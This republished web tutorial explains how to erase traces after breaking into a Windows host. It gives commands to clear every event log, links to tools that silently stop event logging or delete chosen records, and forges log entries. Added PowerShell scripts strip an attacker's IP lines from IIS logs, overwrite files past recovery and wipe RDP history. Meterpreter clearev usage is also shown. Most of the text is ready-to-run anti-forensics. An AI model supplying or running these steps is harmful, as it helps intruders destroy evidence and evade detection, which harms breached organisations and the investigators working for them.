What are the skills of Windows intrusion trace cleaning?

2025-01-20 Update. From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Many newcomers are unclear about how intrusion traces are cleaned on Windows. This article walks through the techniques in detail for anyone who needs them; I hope you get something out of it.

To avoid being detected after an intrusion, attackers hide themselves in a variety of ways: hiding their real IP address, clearing system logs, deleting uploaded tools, hiding backdoor files, and erasing the other traces generated during the intrusion.

01. Clearing Windows event logs

Windows event log paths:

System log: %SystemRoot%\System32\Winevt\Logs\System.evtx
Security log: %SystemRoot%\System32\Winevt\Logs\Security.evtx
Application log: %SystemRoot%\System32\Winevt\Logs\Application.evtx

Registry key holding the event log configuration: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog

How to clear Windows event logs:

(1) The simplest and crudest way

Start → Run, enter eventvwr to open Event Viewer, select a log, and choose Clear Log in the Actions pane on the right.

(2) Clear the Windows event logs in one shot from the command line

Both commands need an elevated prompt. The first clears the three classic logs through the Clear-EventLog cmdlet:

powershell -Command "& {Clear-EventLog -LogName Application,System,Security}"

The second enumerates the named logs and hands each one to wevtutil cl; replace the list with * to clear every log on the host:

Get-WinEvent -ListLog Application,Setup,Security -Force | % { wevtutil.exe cl $_.LogName }
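The point a practitioner should keep in mind is that clearing a log is itself an audited action: emptying the Security log writes event 1102 ("The audit log was cleared") into the fresh Security log, and emptying Application or System writes event 104 into System, naming the account that did it. The following script is an added example, not code from the original article: it clears the three classic logs the way the commands above do and then queries for the records the clearing left behind. It assumes an elevated PowerShell session on a Windows 8/Server 2012 or newer host, where these cmdlets and event IDs exist.

```powershell
# Added example (not from the original article): clear the classic logs, then
# show the evidence that the clearing itself produced. Run elevated.
$logs = 'Application', 'System', 'Security'

function Get-LogRecordCount {
    param([string[]]$Names)
    foreach ($n in $Names) {
        $l = Get-WinEvent -ListLog $n -ErrorAction SilentlyContinue
        [pscustomobject]@{ LogName = $n; Records = $l.RecordCount }
    }
}

'Record counts before clearing:'
Get-LogRecordCount -Names $logs | Format-Table -AutoSize

foreach ($log in $logs) {
    # wevtutil cl <log> is the same operation as Clear-EventLog, one log at a time
    & wevtutil.exe cl $log
}

'Record counts after clearing:'
Get-LogRecordCount -Names $logs | Format-Table -AutoSize

# The clear is audited: Security -> event 1102 in Security; Application/System
# clears -> event 104 in System (provider Microsoft-Windows-Eventlog). Defenders
# hunting for wiped hosts query exactly these IDs, so "empty" is not "no trace".
$clearEvents = @()
$clearEvents += Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 5 -ErrorAction SilentlyContinue
$clearEvents += Get-WinEvent -FilterHashtable @{ LogName = 'System';   Id = 104  } -MaxEvents 5 -ErrorAction SilentlyContinue

'Evidence that logs were cleared (Security 1102 / System 104):'
$clearEvents |
    Select-Object TimeCreated, LogName, Id, @{ n = 'Message'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

If the host forwards events to a collector or runs an EDR agent, the original records have already left the machine before the clear runs; the commands above only touch the local .evtx files.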

(3) Use a script to stop log recording

This script walks the thread stacks of the Event Log service process (the svchost.exe that hosts the EventLog service), identifies the threads belonging to that service, and kills them. It needs an elevated session to open those threads.

As a result the system stops collecting events, while the Event Log service still appears to be running.

Github project address: https://github.com/hlldz/Invoke-Phant0m

(4) Clearing individual Windows log entries

This tool deletes specified records from a Windows event log instead of clearing the whole log.

Github project address: https://github.com/QAX-A-Team/EventCleaner

(5) Forging Windows log entries

eventcreate is a built-in command-line tool that writes a custom event into the Application or System log. It can be used to plant fake entries or to bury real ones under custom noise. It cannot write to the Security log, and the event ID must be between 1 and 1000.

eventcreate /L SYSTEM /SO administrator /T WARNING /D "this is a test" /ID 500

02. IIS logs

IIS default log path (W3SVC1 is the site with ID 1; other sites log under W3SVC<site id>):

%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\

Clear the WWW (W3SVC) logs:

Stop the service: net stop w3svc
Delete all files in the log directory (run inside that directory): del *.*
Start the service again: net start w3svc
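Deleting every log file leaves an empty directory that any administrator will notice. A more surgical approach is to remove only the lines that belong to the attacker's client address. The script below is an added example, not from the original article: it parses the W3C log format that IIS writes, reads the column layout from the "#Fields:" directive rather than hard-coding positions, and rewrites the file without the lines whose c-ip matches. The log content is constructed for the demonstration; on a real host point $LogPath at a file under the log directory above, after stopping w3svc so IIS is not holding the file open.

```powershell
# Added example (not from the original article): drop one client's lines from an
# IIS W3C log. Column positions come from the "#Fields:" header in the file.

function Remove-IisLogLinesByClientIp {
    param(
        [Parameter(Mandatory)][string]$LogPath,
        [Parameter(Mandatory)][string]$ClientIp
    )
    $ipIndex = -1
    $kept = foreach ($line in Get-Content -LiteralPath $LogPath) {
        if ($line.StartsWith('#Fields:')) {
            # "#Fields: date time s-ip cs-method ... c-ip ..." -> find the c-ip column
            $fields  = $line.Substring(8).Trim() -split '\s+'
            $ipIndex = [array]::IndexOf($fields, 'c-ip')
            $line
        }
        elseif ($line.StartsWith('#') -or $ipIndex -lt 0) {
            $line                                   # other directives, or data before any header
        }
        else {
            $cols = $line -split ' '
            if ($cols.Count -le $ipIndex -or $cols[$ipIndex] -ne $ClientIp) { $line }
        }
    }
    # Absolute path required: .NET's working directory differs from the PowerShell location
    [System.IO.File]::WriteAllLines($LogPath, [string[]]$kept)
    return $kept.Count
}

# Constructed sample log (not captured from a real server)
$sample = @'
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-05-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 00:00:01 10.0.0.5 GET /index.html - 80 - 192.0.2.10 Mozilla/5.0 - 200 0 0 12
2024-05-01 00:00:02 10.0.0.5 POST /upload.aspx - 80 - 203.0.113.7 curl/8.0 - 200 0 0 40
2024-05-01 00:00:03 10.0.0.5 GET /shell.aspx cmd=whoami 80 - 203.0.113.7 curl/8.0 - 200 0 0 33
2024-05-01 00:00:04 10.0.0.5 GET /about.html - 80 - 192.0.2.11 Mozilla/5.0 - 200 0 0 9
'@

$tmp = Join-Path $env:TEMP 'u_ex240501.log'
Set-Content -LiteralPath $tmp -Value $sample -Encoding ascii
$remaining = Remove-IisLogLinesByClientIp -LogPath $tmp -ClientIp '203.0.113.7'
"Lines kept: $remaining"        # 6: four directive lines plus the two requests from other clients
Get-Content -LiteralPath $tmp
```

IIS buffers log lines in memory and flushes them roughly once a minute, so lines for the most recent requests may not be in the file yet; that is another reason to stop the service first, as the article does. The file's modification timestamp also changes on rewrite, which a careful investigator will compare against the other daily logs.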

03. Secure erasure with built-in Windows commands

(1) Permanent deletion with Shift+Delete

A file deleted normally can still be found in the Recycle Bin; Shift+Delete bypasses the Recycle Bin and removes it directly. Even so, data-recovery software can restore such a file, because only the directory entry is removed and the data stays on disk until new files overwrite those clusters. Recovery attempted soon after the deletion usually succeeds; once new files have overwritten the original data it becomes difficult.

(2) Overwrite free space repeatedly with the cipher command

After deleting the files, the /W option of the cipher command repeatedly writes other data over the free space of the volume that contained them, so the deleted data cannot be recovered.

For example, delete the files in the D:\tools directory, then run:

cipher /w:D:\tools

The unused space on drive D: is then overwritten three times (once with 0x00, once with 0xFF, and once with random data), and deleted files whose clusters were still free can no longer be recovered. Note that /W touches only unallocated space: it does not wipe files that still exist, and small files stored resident inside their MFT record never occupied any of the clusters it scrubs.

(3) Overwrite while formatting with the format command

With the /P parameter, the format command zeroes every sector and then overwrites the volume the given number of times, using a different random number each time. For example:

format D: /P:8

This command zeroes drive D: and then overwrites it with random data 8 times. /P cannot be combined with /Q (quick format).
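cipher /w runs after the files are gone and only scrubs unallocated space, so a file's own clusters are covered only if nothing else has claimed them, and a small file that lived resident in its MFT record is not covered at all. The helper below is an added example, not from the original article: it overwrites the file's contents in place with the same three patterns cipher uses (0x00, 0xFF, random), renames the file so the original name is not what lingers in the freed MFT entry, deletes it, and can then run cipher /w over the volume's free space. It assumes NTFS and a file that is not compressed or encrypted; on an SSD the in-place overwrite is best effort, because wear levelling may write the new data to a different physical block, a limit the page's own tools share.

```powershell
# Added example (not from the original article): overwrite a file in place with
# three passes (0x00, 0xFF, random), rename it, delete it, optionally scrub free space.
function Remove-FileSecurely {
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$WipeFreeSpace
    )
    $file   = Get-Item -LiteralPath $Path -ErrorAction Stop
    $length = [int64]$file.Length
    $rng    = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $buf    = New-Object byte[] 65536

    foreach ($pass in 0..2) {
        if ($pass -eq 0) { [Array]::Clear($buf, 0, $buf.Length) }                      # pass 1: 0x00
        if ($pass -eq 1) { for ($i = 0; $i -lt $buf.Length; $i++) { $buf[$i] = 0xFF } } # pass 2: 0xFF
        $fs = [System.IO.File]::Open($file.FullName, 'Open', 'Write', 'None')
        try {
            $left = $length
            while ($left -gt 0) {
                if ($pass -eq 2) { $rng.GetBytes($buf) }                                # pass 3: fresh random bytes per chunk
                $n = [int][Math]::Min([int64]$buf.Length, $left)
                $fs.Write($buf, 0, $n)
                $left -= $n
            }
            $fs.Flush($true)    # flush through the OS cache to the device
        }
        finally { $fs.Dispose() }
    }

    # Rename before deleting so the freed MFT entry carries a random name, not the real one
    $newName = [System.IO.Path]::GetRandomFileName()
    Rename-Item -LiteralPath $file.FullName -NewName $newName
    Remove-Item -LiteralPath (Join-Path $file.DirectoryName $newName) -Force

    if ($WipeFreeSpace) {
        # cipher /w:<dir> scrubs the free space of the volume that holds <dir>
        & cipher.exe /w:$($file.DirectoryName)
    }
}

# Demo on a constructed file (not part of the original article)
$demo = Join-Path $env:TEMP 'secret.txt'
Set-Content -LiteralPath $demo -Value ('password=hunter2' * 100)
Remove-FileSecurely -Path $demo            # add -WipeFreeSpace to also run cipher /w afterwards
"Exists after wipe: $(Test-Path -LiteralPath $demo)"
```

The in-place overwrite is what the page's two commands lack: cipher leaves live files alone, and format destroys the whole volume. Volume Shadow Copies, if enabled, can still hold an earlier copy of the file, so check vssadmin list shadows before relying on any of the three methods.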

04. Clear Remote Desktop connection records

When this machine connects to another client or server through Remote Desktop, a record of the connection is kept locally: the host list under HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client and the settings in Default.rdp in the user's Documents folder. Save the following as clear.bat; double-clicking it clears the records automatically.

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
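The batch file deletes blindly. The PowerShell version below is an added example, not from the original article: it first lists what the two keys actually contain, so the operator can see the trace and confirm afterwards that it is gone. "Default" holds the most-recently-used list of hosts typed into mstsc as values MRU0, MRU1, and so on; each subkey under "Servers" is a host name carrying a UsernameHint value with the account last used for it. It runs as the user whose history is being cleared, since both live under HKCU.

```powershell
# Added example (not from the original article): inspect, then clear, the RDP
# client history that the batch file above removes.
$base = 'HKCU:\Software\Microsoft\Terminal Server Client'

function Get-RdpConnectionHistory {
    $history = @()
    # MRU0..MRUn under Default: hosts entered in the mstsc "Computer" box
    $mru = Get-ItemProperty -Path "$base\Default" -ErrorAction SilentlyContinue
    if ($mru) {
        foreach ($p in $mru.PSObject.Properties | Where-Object Name -like 'MRU*') {
            $history += [pscustomobject]@{ Source = "Default\$($p.Name)"; Host = $p.Value; User = $null }
        }
    }
    # Servers\<host>\UsernameHint: the account last used for each host
    foreach ($k in Get-ChildItem -Path "$base\Servers" -ErrorAction SilentlyContinue) {
        $hint = (Get-ItemProperty -Path $k.PSPath -Name UsernameHint -ErrorAction SilentlyContinue).UsernameHint
        $history += [pscustomobject]@{ Source = 'Servers'; Host = $k.PSChildName; User = $hint }
    }
    return $history
}

function Clear-RdpConnectionHistory {
    # Same steps as the batch file: MRU values, the Servers key (recreated empty), Default.rdp
    $mru = Get-ItemProperty -Path "$base\Default" -ErrorAction SilentlyContinue
    if ($mru) {
        $names = $mru.PSObject.Properties.Name | Where-Object { $_ -like 'MRU*' }
        foreach ($n in $names) { Remove-ItemProperty -Path "$base\Default" -Name $n }
    }
    Remove-Item -Path "$base\Servers" -Recurse -ErrorAction SilentlyContinue
    New-Item -Path "$base\Servers" -Force | Out-Null

    $rdp = Join-Path ([Environment]::GetFolderPath('MyDocuments')) 'Default.rdp'
    if (Test-Path -LiteralPath $rdp) {
        # Default.rdp is created hidden+system; -Force removes it without clearing attributes first
        Remove-Item -LiteralPath $rdp -Force
    }
}

'Before:'
Get-RdpConnectionHistory | Format-Table -AutoSize
Clear-RdpConnectionHistory
'After (expect no rows):'
Get-RdpConnectionHistory | Format-Table -AutoSize
```

Outbound RDP also leaves records outside HKCU: the Microsoft-Windows-TerminalServices-RDPClient/Operational log records each connection attempt, and the remote side logs the logon, so clearing the client-side history alone does not remove the trail.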

05. Metasploit trace removal

(1) View the event logs

meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

 Name                    Retention  Maximum Size  Records
 ----                    ---------  ------------  -------
 Application             Disabled   20971520K     2149
 HardwareEvents          Disabled   20971520K     0
 Internet Explorer       Disabled   K             0
 Key Management Service  Disabled   20971520K     0
 Security                Disabled   20971520K     1726
 System                  Disabled   20971520K     3555
 Windows PowerShell      Disabled   15728640K     138

(2) Clear the event logs (every log listed above)

meterpreter > run event_manager -c

(3) Alternatively, the clearev command clears the target's event logs, but only the three classic ones (Application, System, Security):

meterpreter > clearev
[*] Wiping 4 records from Application...
[*] Wiping 8 records from System...
[*] Wiping 7 records from Security...


© 2024 shulou.com SLNews company. All rights reserved.
